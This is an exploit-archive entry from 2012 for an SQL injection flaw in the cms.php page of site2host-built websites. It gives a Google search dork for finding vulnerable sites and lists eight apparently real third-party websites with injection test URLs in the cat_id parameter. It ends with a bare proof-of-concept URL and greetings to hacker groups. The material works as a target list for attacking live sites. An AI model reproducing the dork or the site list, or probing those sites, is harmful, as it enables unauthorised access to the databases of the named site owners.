site2host (cms.php) SQL Injection Vulnerability

2012-10-08T00:00:00
ID 1337DAY-ID-19528
Type zdt
Reporter Mouh Marvel-Dz
Modified 2012-10-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #########################################################################
# Exploit Title: [ site2host (cms.php) SQL Injection Vulnerability ]                 
# Date: [08-10-2012]                                                    
# Author: [Mouh Marvel-Dz]                                    
# Facebook : http://www.facebook.com/mouh.marvel                      
# Category: [webapps]                                                    
# Google dork: intext:"designed by site2host.com" inurl:cms.php?cat_id=
# Tested on: [Windows 7 ]                                               
#########################################################################

Example Sites : 

http://paropkarinisabha.com/cms.php?cat_id=828'
http://rachnaplasticizers.com/cms.php?cat_id=805'
http://kalibarithane.com/cms.php?cat_id=102'
http://classicfoods.co.in/cms.php?cat_id=578'
http://rebcor.co.in/cms.php?cat_id=1780'
http://itlservice.net/cms.php?cat_id=1874'
http://jileshbabla.com/cms.php?cat_id=398'
http://sk-india.com/cms.php?cat_id=582'


and more in Google


[~]Exploit/p0c : http://www.site.com/cms.php?cat_id=[SQLi]


Greetz [ ShinoBi-Dz / Team R00t / Arm4dill0.DZ / Laze De Pique ] 

                     -[Freedom to Palestine]-



#  0day.today [2018-04-11]  #